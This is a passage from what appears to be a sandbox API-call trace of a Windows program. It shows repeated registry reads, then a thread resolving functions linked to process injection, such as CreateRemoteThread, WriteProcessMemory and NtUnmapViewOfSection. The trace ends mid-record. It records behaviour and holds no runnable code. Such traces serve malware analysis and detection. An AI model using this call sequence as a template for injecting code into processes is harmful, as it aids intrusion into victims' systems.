RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.900] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.900] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.901] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.901] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.948] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.948] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.948] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.948] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.981] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.981] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.981] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.981] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.024] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.024] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.024] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.024] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.060] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.060] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.060] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.060] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.079] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.079] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.079] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.079] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.111] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.111] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.111] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.111] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.142] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.142] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.142] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.142] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.183] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.183] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.183] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.183] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.213] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.213] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.213] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.213] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.256] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.256] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.256] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.256] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.296] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.296] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.296] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.296] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.321] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.321] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.321] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.321] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.343] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.343] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.343] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.343] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0274.371] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0274.371] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0274.371] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0274.371] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 Thread: id = 96 os_tid = 0xb40 [0208.711] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x235f848 | out: BaseAddress=0x235f848*=0x7ff977f30000) returned 0x0 [0208.712] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtCreateSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc39e0) returned 0x0 [0208.712] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtUnmapViewOfSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc37e0) returned 0x0 [0208.712] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtMapViewOfSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc37c0) returned 0x0 [0208.713] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwOpenProcessToken", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc4680) returned 0x0 [0208.713] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwClose", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc3630) returned 0x0 [0208.714] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryInformationToken", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc3750) returned 0x0 [0208.714] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwOpenProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc37a0) returned 0x0 [0208.715] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtQuerySystemInformation", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc38a0) returned 0x0 [0208.715] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlNtStatusToDosError", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f3f0c0) returned 0x0 [0208.715] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryInformationProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc36d0) returned 0x0 [0208.716] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlImageDirectoryEntryToData", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f46850) returned 0x0 [0208.716] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_wcsupr", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb58a0) returned 0x0 [0208.717] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_strupr", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb4f60) returned 0x0 [0208.717] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memmove", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc7e80) returned 0x0 [0208.717] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="bsearch", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb6420) returned 0x0 [0208.718] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb5260) returned 0x0 [0208.718] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_strlwr", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb4e60) returned 0x0 [0208.719] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="atoi", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb43d0) returned 0x0 [0208.719] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="strstr", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb8bd0) returned 0x0 [0208.719] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="wcscpy", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb9650) returned 0x0 [0208.720] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryKey", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc36a0) returned 0x0 [0208.720] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlUpcaseUnicodeString", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f83170) returned 0x0 [0208.721] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlFreeUnicodeString", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f57110) returned 0x0 [0208.721] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="sprintf", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb7fb0) returned 0x0 [0208.722] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_snprintf", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb4970) returned 0x0 [0208.722] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memset", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc81c0) returned 0x0 [0208.722] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc7e80) returned 0x0 [0208.723] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="strcpy", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb82f0) returned 0x0 [0208.723] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlAdjustPrivilege", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fa32a0) returned 0x0 [0208.724] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="mbstowcs", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb75a0) returned 0x0 [0208.724] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlImageNtHeader", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f46820) returned 0x0 [0208.724] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb76a0) returned 0x0 [0208.725] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="__C_specific_handler", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fb3f20) returned 0x0 [0208.725] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="__chkstk", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977fc6290) returned 0x0 [0208.725] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x235f848 | out: BaseAddress=0x235f848*=0x7ff977ab0000) returned 0x0 [0208.726] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLocalTime", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace9e0) returned 0x0 [0208.727] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aca8f0) returned 0x0 [0208.727] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualQueryEx", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad24a0) returned 0x0 [0208.727] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateRemoteThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af26d0) returned 0x0 [0208.728] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aceca0) returned 0x0 [0208.728] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVersion", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad1fd0) returned 0x0 [0208.729] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetEndOfFile", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5ae0) returned 0x0 [0208.729] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveDirectoryW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5ad0) returned 0x0 [0208.729] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTempFileNameA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad59e0) returned 0x0 [0208.730] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f381b0) returned 0x0 [0208.730] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbaf0) returned 0x0 [0208.731] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acd680) returned 0x0 [0208.731] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5510) returned 0x0 [0208.731] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WriteProcessMemory", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace710) returned 0x0 [0208.732] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5760) returned 0x0 [0208.732] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpiA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbb10) returned 0x0 [0208.733] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0c70) returned 0x0 [0208.733] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad2080) returned 0x0 [0208.733] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6580) returned 0x0 [0208.734] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acdf40) returned 0x0 [0208.735] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetModuleHandleA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace6d0) returned 0x0 [0208.735] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileMappingA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ab5bc0) returned 0x0 [0208.736] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace950) returned 0x0 [0208.736] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac8f00) returned 0x0 [0208.737] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acecc0) returned 0x0 [0208.737] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalLock", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6230) returned 0x0 [0208.738] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrlenA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbb80) returned 0x0 [0208.738] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acb810) returned 0x0 [0208.738] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GlobalUnlock", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6170) returned 0x0 [0208.739] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f5ebf0) returned 0x0 [0208.739] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpyA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acedf0) returned 0x0 [0208.740] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6060) returned 0x0 [0208.740] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6050) returned 0x0 [0208.740] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveDirectoryA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5ac0) returned 0x0 [0208.742] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5790) returned 0x0 [0208.742] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcatA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0e30) returned 0x0 [0208.743] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5b80) returned 0x0 [0208.743] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateDirectoryA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5730) returned 0x0 [0208.744] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapDestroy", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad2e50) returned 0x0 [0208.744] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapCreate", Ordinal=0x0, 